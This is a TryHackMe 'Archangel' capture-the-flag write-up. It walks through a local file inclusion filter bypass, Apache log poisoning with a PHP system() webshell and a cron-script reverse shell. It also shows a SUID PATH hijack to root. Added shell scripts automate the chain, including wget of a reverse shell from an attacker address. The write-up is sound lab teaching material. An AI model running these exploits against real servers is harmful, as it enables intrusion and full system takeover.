CTF-Writeups/TryHackMe/Archangel.md
2021-02-19 00:56:38 +05:00

TryHackMe-Archangel

Rustscan

rustscan -a 10.10.53.100 -- -A -sC -sV
Open 10.10.53.100:22
Open 10.10.53.100:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPrwb4vLZ/CJqefgxZMUh3zsubjXMLrKYpP8Oy5jNSRaZynNICWMQNfcuLZ2GZbR84iEQJrNqCFcbsgD+4OPyy0TXV1biJExck3OlriDBn3g9trxh6qcHTBKoUMM3CnEJtuaZ1ZPmmebbRGyrG03jzIow+w2updsJ3C0nkUxdSQ7FaNxwYOZ5S3X5XdLw2RXu/o130fs6qmFYYTm2qii6Ilf5EkyffeYRc8SbPpZKoEpT7TQ08VYEICier9ND408kGERHinsVtBDkaCec3XmWXkFsOJUdW4BYVhrD3M8JBvL1kPmReOnx8Q7JX2JpGDenXNOjEBS3BIX2vjj17Qo3V
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKhhd/akQ2OLPa2ogtMy7V/GEqDyDz8IZZQ+266QEHke6vdC9papydu1wlbdtMVdOPx1S6zxA4CzyrcIwDQSiCg=
|   256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBE3FV9PrmRlGbT2XSUjGvDjlWoA/7nPoHjcCXLer12O
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

PORT 80 (HTTP)

Looking at the page source we find a domain name, mafialive.thm.

So let's map it to the target in our /etc/hosts file (10.10.53.100 mafialive.thm).

Now we need to fuzz for the page that is "under development"; for that I am going to use gobuster.

And we find a test.php file.

On clicking the button we can see that the URL carries a GET parameter (view), so we can check for LFI (Local File Inclusion). I tried a bunch of plain traversal payloads such as ../../../../etc/passwd, but they all failed.

I used the php://filter wrapper instead: convert.base64-encode returns the included file base64-encoded, so its PHP source is disclosed instead of executed (decode the output with base64 -d). For mrrobot.php, the page the button loads through that parameter:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

We can do this for test.php as well

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

To look for a traversal that reaches /etc/passwd we can fuzz the view parameter with wfuzz, using the path test.php already accepts as the starting point:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/test.php

Most payloads come back with response lengths 286 and 310, which are not /etc/passwd (they are the same two pages every failed attempt returns), so hide those two lengths (wfuzz --hh 286,310) and only the payloads that actually reach the file remain.

For a reverse shell we are going to poison the apache2 access log, but first we need to make sure the log can be included through test.php.

We can reach it with the same kind of traversal, keeping the development_testing prefix:

http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log

Note the shape of the payload: the path still contains /var/www/html/development_testing, and every .. is separated by ./ so the literal sequence ../.. (which the plain traversal attempts contained) never appears, yet PHP collapses the dot segments and opens /var/log/apache2/access.log.

Now intercept a request in Burp Suite and put a PHP snippet that runs a GET parameter into the User-Agent header, for example <?php system($_GET['c']); ?>. Apache writes the header into access.log unescaped, so the next time the log is included through test.php that snippet is executed.

Let's include the log again with &c=id at the end:

http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log&c=id

At the bottom of the page we can see that the id command was executed, so we have code execution and can now get a reverse shell.

Host a file containing a reverse shell payload on our machine and start a listener; then, through the c parameter, download it onto the target, give it execute permission (chmod +x) and execute it.
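The whole chain (php://filter source disclosure, the traversal that gets past test.php's check, log poisoning and command execution) as shell functions. This is an added example, not code from the writeup: mafialive.thm, the view and c parameters and the development_testing directory come from the room, while the filter rules modelled in filter_allows, the attacker address 10.9.0.1 and the /tmp/shell.sh drop path are assumptions.

```shell
#!/bin/sh
# Added example, not the writeup's own code: LFI-to-RCE against test.php.
# From the writeup: host mafialive.thm, the "view" parameter, the
# development_testing directory and the "c" parameter used after poisoning.
# Assumptions: the filter rules in filter_allows, ATTACKER, /tmp/shell.sh.

TARGET="http://mafialive.thm/test.php"
ALLOWED_PREFIX="/var/www/html/development_testing"
ATTACKER="10.9.0.1"          # assumption: where our listener and web server live

# Model of test.php's include check (assumption, written down so the bypass
# can be verified offline): the path must contain the development_testing
# directory and must not contain the literal "../..".
filter_allows() {
    case "$1" in
        *../..*) return 1 ;;
    esac
    case "$1" in
        *"$ALLOWED_PREFIX"*) return 0 ;;
    esac
    return 1
}

# Collapse "." and ".." textually, which is what PHP does to an include path
# before open(): a component that does not exist on disk is simply removed by
# the ".." that follows it, without ever being stat'ed.
normalize() {
    out=""
    oldifs=$IFS
    IFS=/
    for seg in $1; do
        case "$seg" in
            ""|.) ;;
            ..)   out=${out%/*} ;;
            *)    out="$out/$seg" ;;
        esac
    done
    IFS=$oldifs
    printf '%s\n' "${out:-/}"
}

# Traversal that keeps the required prefix and separates every ".." with "./",
# so "../.." never occurs while the path still climbs four levels to /.
bypass_path() {              # $1 = absolute file to include
    p="$ALLOWED_PREFIX"
    i=0
    while [ "$i" -lt 4 ]; do
        p="$p/../."
        i=$((i + 1))
    done
    printf '%s/%s\n' "$p" "${1#/}"
}

lfi_url() {                  # $1 = path to include (PHP in it is executed)
    printf '%s?view=%s\n' "$TARGET" "$1"
}

source_url() {               # $1 = PHP file whose source we want, base64-encoded
    printf '%s?view=php://filter/convert.base64-encode/resource=%s\n' "$TARGET" "$1"
}

# Fetch a PHP file's source: pull the base64 run out of the page and decode it.
dump_source() {
    curl -s "$(source_url "$1")" | grep -o '[A-Za-z0-9+/=]\{40,\}' | base64 -d
}

# One request with PHP in the User-Agent; Apache writes it verbatim into
# access.log. A malformed tag here makes every later include of the log fail.
poison_log() {
    curl -s -A '<?php system($_GET["c"]); ?>' "$TARGET" > /dev/null
}

# Include the poisoned log with the command in "c"; -G --data-urlencode
# appends it to the query string properly encoded.
run_cmd() {                  # $1 = shell command to run on the target
    curl -s -G --data-urlencode "c=$1" \
        "$(lfi_url "$(bypass_path /var/log/apache2/access.log)")"
}

# The writeup's sequence: read test.php, poison, confirm with id, fetch the
# hosted reverse shell, make it executable, run it (listener already up).
if [ "${1:-}" = "--exploit" ]; then
    dump_source "$ALLOWED_PREFIX/test.php"
    poison_log
    run_cmd 'id'
    run_cmd "wget http://$ATTACKER/shell.sh -O /tmp/shell.sh"
    run_cmd 'chmod +x /tmp/shell.sh'
    run_cmd '/tmp/shell.sh'
fi
```

Run it with --exploit once the listener is up; without arguments it only defines the functions. bypass_path writes development_testing/../. rather than the writeup's development_testing./.. spelling; both resolve the same way because PHP collapses the dot segments before opening the file, the former just climbs out of a directory that exists. Test the User-Agent tag locally before sending it: a PHP parse error written into access.log breaks every later include of that log until it is rotated.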

Checking cron jobs (/etc/crontab) we see a script that cron runs as the user archangel.

That script is writable by anyone, so we can append a bash reverse shell to it and wait for the next run to get a shell as archangel.

And we got the shell.

We also find a backup binary with the SUID bit set, owned by root (user and group). Running strings on it

shows that it calls cp (the copy command) by bare name rather than by absolute path, so PATH hijacking applies: create a script named cp that does what we want (it will run as root), put its directory first in PATH, and let the binary find our "fake" cp instead of /bin/cp.

Now run the binary.

For simplicity I made /bin/bash SUID (chmod u+s /bin/bash from the fake cp) so it can be run as root. Bash drops the effective uid unless it is started with -p, so the root shell is bash -p.
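The hijack reproduced locally, as an added example rather than the writeup's own commands: a fake cp is planted in a directory we control, that directory is prepended to PATH, and a stand-in for the backup binary (a shell script here, so the demo needs no root) calls cp by bare name and gets ours. Everything the script creates is constructed; only the bare cp call and the SUID backup binary come from the writeup.

```shell
#!/bin/sh
# Added example, not the writeup's own code: PATH hijack of a program that
# calls "cp" without an absolute path. The SUID backup binary is replaced by
# a stand-in script so this runs unprivileged; all files here are constructed.

# Our fake cp, to be found first in PATH. In the real attack its body is what
# root should run for us (the writeup's choice: chmod u+s /bin/bash, then
# bash -p); here it only announces that it was reached.
plant_fake_cp() {           # $1 = directory that will hold the fake binary
    mkdir -p "$1"
    printf '#!/bin/sh\necho "cp hijacked"\n' > "$1/cp"
    chmod +x "$1/cp"
}

# Stand-in for the SUID backup binary. The tell in strings output is "cp ..."
# with no leading slash: the shell resolves it through PATH.
make_victim() {             # $1 = path for the stand-in
    printf '#!/bin/sh\ncp /some/source /some/destination\n' > "$1"
    chmod +x "$1"
}

# Put our directory first in PATH and run the victim: our cp wins the lookup.
run_hijack() {
    dir=$(mktemp -d)
    plant_fake_cp "$dir/bin"
    make_victim "$dir/backup"
    PATH="$dir/bin:$PATH" "$dir/backup"
    rm -rf "$dir"
}

run_hijack
```

Against the real binary the steps are the same three lines: write the fake cp (for example chmod u+s /bin/bash) into a directory you own, export PATH with that directory first, run backup, then bash -p. Two things have to be true for this to work and both are visible before you try it: strings shows cp without a leading slash, and the binary does not reset PATH before calling system().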